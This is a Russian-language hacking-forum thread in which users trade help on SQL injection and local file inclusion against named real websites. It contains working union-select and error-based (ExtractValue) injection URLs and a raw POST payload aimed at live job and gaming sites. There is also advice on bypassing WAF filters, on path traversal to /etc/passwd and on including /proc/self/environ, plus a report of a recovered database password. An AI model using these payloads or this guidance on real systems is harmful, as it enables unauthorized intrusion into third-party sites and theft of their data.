Кто сказал, что LFI? Внимательно читаем ерроры и варнинги. Во первых, судя по тому, что при подстановке в GET запрос переменной из ошибки вида - http://kvostava.us/modules/boonex/poll/index.php?aModule не дает никакой реакции. Вывод - либо определяется локально в скриптах, либо в реквесте используется другая переменная , а в скриптах переопределяется на $aModule. В любом случае, неопределенная константа BX_DIRECTORY_PATH_MODULES - в пути к файлу не даст провести операцию. Более того, require_once(BX_DIRECTORY_PATH_MODULESclasses/View.php) явно повествует о том, что вследствии того , что она самая константа неопределена - скрипт не может подключить - константа/classes/View.php. Явно, что модуль, коим данный файл и является, использует константы и прочие данные определенные уровнем выше.
Code: _ttp://www.localtoolbox.com/corporate/index.php ?cat_id=-9 3+union+select+1,2,3,4,5,6,7,8,9,10, 11--+ Вроде всё верно делаю, а вот принтабильные поля никак не могу увидеть.
http://www.localtoolbox.com/corporate/index.php?cat_id=-93'+union+select+1,2,3,version(),5,6,7,8,9,0,11--+
странно, вроде как пробовал и так, но никакого результата... спасибо огромное. Очень оперативно отозвались
зачем тебе вывод ошибки если нужно узнать количество таблиц? Оо если имеется ввиду количество колонок то order by, group by контент страницы должно менятся если запрос возвращает false
Какая-то странная инъекция ... http://www.glhf.ru/index.php?option=com_seyret&Itemid=105&catid=-1+union+select+0x313233--
в LFI в запросах фильтруется <? и ?> как обойти? фильтрацию прошел проинклудил proc/self/environ php код просто написан и почему то не выполняется
что именно фильтруется? никогда не встречал такого чтоб фильтрировался слово "etc", если /etc/passwd, то попробуй /etc/какаятофигня/../passwd
ну поэксперементируй с кодированием, с хексом и тп попрубуй понять логику WAF. а сначала обясни зачем тебе нужен каталог /etc/ ?
хекс попробовал, 0x...... не работает. конфиги посмотреть. нашел пасс от дб, пробовал удаленно подкл к sql не успешно
Народ, как правильно заэкранировать хвост запроса в MySQL? так /* не получается, и так -- или так # тоже, хотя в запрос они и попадают, но парсер всё равно выполняет всё что идёт за ними... И пишет You have an error in your SQL syntax Запрос такой: Code: select * from (SELECT sector_id,sector_name , (select count(*) from tbl_jobs where status_cd='sENAB' and position_sector=s.sector_id and education_level=9; /* ) job_count FROM tbl_sectors s where lang_cd='RUS' order by order_id)a where a.job_count>0
Пожалуйста)) Только не ломайте раньше меня plz, я сам хочу попробовать)) Не отнимайте игрушку, так сказать Решётка тоже не прокатила. К сожалению... Code: POST /rabota_01.php HTTP/1.1 Host: www.karyera.kz Accept-Encoding: gzip Connection: keep-alive User-Agent: Mozilla/5.0 SF/2.09b Range: bytes=0-399999 Referer: http://www.karyera.kz/ Cookie: LEARN_LANGCD=RUS; LEARN_ANKETID=deleted; HRSITE_COMPANYID=22 Content-Type: application/x-www-form-urlencoded Content-Length: 222 p_EducationID=9#--/*&p_EducationName=&p_LanguageID=&p_LanguageName=&p_GenderID=&p_GenderName=&p_CompanyID=&p_Keyword=&p_pageindx=&p_SectorID=&p_SectorName=&p_LocationID=&p_LocationName=&p_ExperienceID=&p_ExperienceName=& В урле слова типа Select фильтруются, поэтому только через post.
http://candidate.karyera.kz/search_01.php POST / p_Keyword='or(ExtractValue(1,concat(0x3a,version())))='1